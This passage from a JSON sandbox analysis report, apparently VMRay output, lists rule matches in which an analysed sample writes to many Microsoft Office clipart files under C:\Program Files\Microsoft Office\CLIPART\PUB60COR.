}, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02287_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41382", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02287_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02288_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41391", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02288_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02293_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41400", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02293_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02296_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41409", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02296_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02369_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02369_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41418", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02369_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02522_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41425", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02522_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02950_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02950_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02957_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41439", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02957_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03236_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03236_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41446", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03236_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03241_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03241_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41453", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03241_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03257_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03257_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41460", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03257_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03331_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03331_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41467", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03331_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03339_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03339_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41474", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03339_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03451_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03451_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41481", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03451_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41488", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03459_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03459_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41495", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03459_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03464_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41502", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03464_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03466_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41509", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03466_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03470_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41518", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03470_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03513_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03513_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41525", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03513_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03668_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03668_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41532", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03668_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03731_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03731_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41539", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03731_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03795_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03795_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41546", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03795_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE04050_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe04050_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41553", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe04050_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05665_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05665_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41560", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05665_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05710_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05710_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41567", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05710_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05869_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05869_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41574", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05869_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05870_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05870_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41581", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05870_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05930_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41588", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05930_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06049_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41597", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06049_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06450_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06450_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00601g.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_41613", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00601g.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00780u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": 